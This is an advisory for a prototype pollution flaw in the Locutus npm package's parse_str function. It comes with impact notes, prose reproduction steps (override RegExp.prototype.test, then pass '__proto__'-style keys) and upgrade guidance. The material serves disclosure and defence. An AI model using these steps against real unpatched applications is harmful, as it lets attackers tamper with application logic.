Locutus Prototype Pollution Vulnerability in parse_str Function

A prototype pollution vulnerability has been identified in the Locutus npm package, specifically in versions 2.0.39 prior to 3.0.25. The issue arises in the parse_str function, where an attacker can manipulate Object.prototype by overriding RegExp.prototype.test. This is achieved by sending a crafted query string to parse_str, effectively bypassing the function's prototype pollution guard. The vulnerability is a result of an incomplete fix for a previous issue, CVE-2026-25521, which had replaced a more robust guard with one that is easily circumvented.

Impact

Exploitation of this vulnerability leads to prototype pollution, allowing attackers to inject properties into Object.prototype. This can disrupt the application's prototype chain and potentially cause hidden property injection, which could be exploited if the injected properties are used in a way that triggers application logic or vulnerabilities.

Reproduction

To reproduce this vulnerability, first install the Locutus package. Then, override RegExp.prototype.test to disable its default functionality. After that, call the parse_str function with a query string that targets prototype keys, such as '__proto__', 'constructor', or 'prototype'. Finally, restore RegExp.prototype.test to its original state and check Object.prototype for the injected property.

Remediation

Users can upgrade to Locutus version 3.0.25 or later, where this vulnerability has been fixed.